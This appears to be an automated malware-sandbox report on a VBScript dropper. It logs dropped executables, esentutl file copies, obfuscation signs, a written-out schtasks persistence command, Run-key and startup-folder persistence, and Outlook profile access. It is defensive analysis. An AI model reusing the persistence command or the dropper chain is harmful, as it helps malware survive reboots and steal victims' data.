                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exe  Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
                      Source: Window Recorder  Window detected: More than 3 window changes detected
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe  Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles
                      Source: IBKB.vbs  Static file information: File size 1636027 > 1048576
                      Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb  source: x.exe, 00000002.00000003.2122855279.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2123814869.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2122855279.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000002.2371298142.000000007EF46000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: easinvoker.pdb  source: x.exe, x.exe, 00000002.00000003.2122855279.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2069405714.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2123814869.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2122855279.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000002.2275324060.0000000020AE4000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000002.2169383134.00000000022C6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000002.2275324060.0000000020B20000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2070521735.000000007F920000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000002.2371298142.000000007EF46000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: _.pdb  source: Native_neworigin.exe, 00000009.00000002.2398990353.0000000003FC5000.00000004.00000800.00020000.00000000.sdmp, Native_neworigin.exe, 00000009.00000003.2169212695.000000000091E000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 00000009.00000002.2397545638.0000000002A56000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 00000009.00000002.2413068752.0000000005200000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: cmd.pdbUGP  source: esentutl.exe, 00000005.00000003.2139842798.00000000052A0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: easinvoker.pdbH  source: x.exe, 00000002.00000003.2122855279.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2123814869.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2122855279.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000002.2371298142.000000007EF46000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: easinvoker.pdbGCTL  source: x.exe, 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2145398702.000000002214F000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000002.00000003.2069405714.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2145398702.0000000022120000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000002.00000002.2191785418.0000000002B7F000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000002.00000002.2275324060.0000000020AE4000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000002.2169383134.00000000022C6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000002.2275324060.0000000020B20000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2070075040.0000000002B79000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000002.00000003.2070521735.000000007F920000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: cmd.pdb  source: esentutl.exe, 00000005.00000003.2139842798.00000000052A0000.00000004.00001000.00020000.00000000.sdmp

                      Data Obfuscation

                      Source: C:\Windows\System32\wscript.exe | Anti Malware Scan Interface: .Run("C:\Users\user\AppData\Local\Temp\x.exe");
                      Source: Yara match | File source: 2.2.x.exe.2db0000.2.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000002.00000003.2069405714.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.2070521735.000000007F920000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: 9.2.Native_neworigin.exe.5200f08.6.raw.unpack, WP6RZJql8gZrNhVA9v.cs | .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                      Source: 9.2.Native_neworigin.exe.5850000.8.raw.unpack, WP6RZJql8gZrNhVA9v.cs | .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                      Source: 9.2.Native_neworigin.exe.2a9711e.2.raw.unpack, WP6RZJql8gZrNhVA9v.cs | .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                      Source: 9.2.Native_neworigin.exe.401c190.5.raw.unpack, WP6RZJql8gZrNhVA9v.cs | .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                      Source: aymtmquJ.pif.2.dr | Static PE information: 0x9E9038DB [Sun Apr 19 22:51:07 2054 UTC]
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 2_2_02DC894C LoadLibraryW,GetProcAddress,FreeLibrary, 2_2_02DC894C
                      Source: alpha.pif.5.dr | Static PE information: section name: .didat
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 2_2_02DDD2FC push 02DDD367h; ret 2_2_02DDD35F
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 2_2_02DB63B0 push 02DB640Bh; ret 2_2_02DB6403
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 2_2_02DB63AE push 02DB640Bh; ret 2_2_02DB6403
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 2_2_02DBC349 push 8B02DBC1h; ret 2_2_02DBC34E
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 2_2_02DDC378 push 02DDC56Eh; ret 2_2_02DDC566
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 2_2_02DB332C push eax; ret 2_2_02DB3368
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 2_2_02DDD0AC push 02DDD125h; ret 2_2_02DDD11D
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 2_2_02DC306C push 02DC30B9h; ret 2_2_02DC30B1
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 2_2_02DC306B push 02DC30B9h; ret 2_2_02DC30B1
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 2_2_02DDD1F8 push 02DDD288h; ret 2_2_02DDD280
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 2_2_02DDD144 push 02DDD1ECh; ret 2_2_02DDD1E4
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 2_2_02DCF108 push ecx; mov dword ptr [esp], edx 2_2_02DCF10D
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 2_2_02DB6782 push 02DB67C6h; ret 2_2_02DB67BE
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 2_2_02DB6784 push 02DB67C6h; ret 2_2_02DB67BE
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 2_2_02DBD5A0 push 02DBD5CCh; ret 2_2_02DBD5C4
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 2_2_02DDC570 push 02DDC56Eh; ret 2_2_02DDC566
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 2_2_02DBC56C push ecx; mov dword ptr [esp], edx 2_2_02DBC571
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 2_2_02DC8AD8 push 02DC8B10h; ret 2_2_02DC8B08
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 2_2_02DCAAE0 push 02DCAB18h; ret 2_2_02DCAB10
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 2_2_02DBCBEC push 02DBCD72h; ret 2_2_02DBCD6A
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 2_2_02DC886C push 02DC88AEh; ret 2_2_02DC88A6
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 2_2_02E24850 push eax; ret 2_2_02E24920
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 2_2_02DBC9DF push 02DBCD72h; ret 2_2_02DBCD6A
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 2_2_02DC6948 push 02DC69F3h; ret 2_2_02DC69EB
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 2_2_02DC6946 push 02DC69F3h; ret 2_2_02DC69EB
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 2_2_02DBC977 push 02DBCD72h; ret 2_2_02DBCD6A
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 2_2_02DC790C push 02DC7989h; ret 2_2_02DC7981
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 2_2_02DC5E7C push ecx; mov dword ptr [esp], edx 2_2_02DC5E7E
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 2_2_02DC2F60 push 02DC2FD6h; ret 2_2_02DC2FCE
                      Source: C:\Users\Public\Libraries\aymtmquJ.pif | Code function: 8_1_004CA22B push 0000002Eh; iretd 8_1_004CA258
                      Source: C:\Users\Public\Libraries\aymtmquJ.pif | Code function: 8_1_004CD6D6 pushad ; ret 8_1_004CD694
                      Source: 9.2.Native_neworigin.exe.5200f08.6.raw.unpack, WP6RZJql8gZrNhVA9v.cs | High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'IFWZPInEOmhB5', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                      Source: 9.2.Native_neworigin.exe.5850000.8.raw.unpack, WP6RZJql8gZrNhVA9v.cs | High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'IFWZPInEOmhB5', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                      Source: 9.2.Native_neworigin.exe.2a9711e.2.raw.unpack, WP6RZJql8gZrNhVA9v.cs | High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'IFWZPInEOmhB5', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                      Source: 9.2.Native_neworigin.exe.401c190.5.raw.unpack, WP6RZJql8gZrNhVA9v.cs | High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'IFWZPInEOmhB5', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'

                      Persistence and Installation Behavior

                      Source: C:\Windows\SysWOW64\esentutl.exe | File created: C:\Users\Public\alpha.pif (reported 3 times)
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | File created: C:\Users\Public\Libraries\aymtmquJ.pif (reported 2 times)
                      Source: C:\Windows\SysWOW64\esentutl.exe | File created: C:\Users\Public\Libraries\Juqmtmya.PIF (reported 2 times)
                      Source: C:\Users\Public\Libraries\aymtmquJ.pif | File created: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe
                      Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Local\Temp\x.exe
                      Source: C:\Users\Public\Libraries\aymtmquJ.pif | File created: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe | File created: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe

                      Boot Survival

                      Source: C:\Windows\SysWOW64\esentutl.exe | File created: C:\Users\Public\alpha.pif
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 04:29 /du 23:59 /sc daily /ri 1 /f
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\apihost.exe.lnk (reported 2 times)
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe | Code function: 9_2_0084CBD0 StrStrIW,CloseHandle,StrStrIW,CloseServiceHandle,OpenServiceW,StrStrIW,_wcslen,ChangeServiceConfigW,StrStrIW,StrStrIW,CloseServiceHandle,CloseHandle,StartServiceW, 9_2_0084CBD0
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Juqmtmya (reported 2 times)

                      Hooking and other Techniques for Hiding and Protection

                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 (reported 4 times)
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 (reported 3 times)
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 2_2_02DCAB1C GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 2_2_02DCAB1C
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot (reported 2 times)
                      Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX (reported 3 times)
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\aymtmquJ.pif | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe | Process information set: NOOPENFILEERRORBOX (reported 60 times)
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe | Process information set: NOOPENFILEERRORBOX (reported 23 times)
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (reported 72 times)
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
